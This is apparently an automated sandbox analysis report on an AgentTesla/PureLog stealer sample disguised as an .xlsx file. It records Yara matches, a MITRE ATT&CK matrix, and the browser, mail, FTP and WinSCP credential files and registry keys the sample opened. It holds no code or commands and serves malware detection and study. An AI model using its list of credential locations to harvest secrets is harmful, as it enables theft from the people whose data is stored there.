Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 2912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 5852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 7500, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.adobe.exe.2a7f0b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.adobe.exe.2a7f0b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1813288032.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1675216718.0000000008110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 2912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 5852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 7500, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42f57b0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.42ba190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4116477558.000000000275C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4116477558.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671890602.00000000042B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 7064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BL NBNSA240600050.xlsx.exe PID: 2912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 5852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 7500, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.adobe.exe.2a7f0b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.adobe.exe.2a7f0b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1813288032.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671407520.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1813288032.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1675216718.0000000008110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1671407520.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	112 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	12 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	22 Software Packing	NTDS	211 Security Software Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
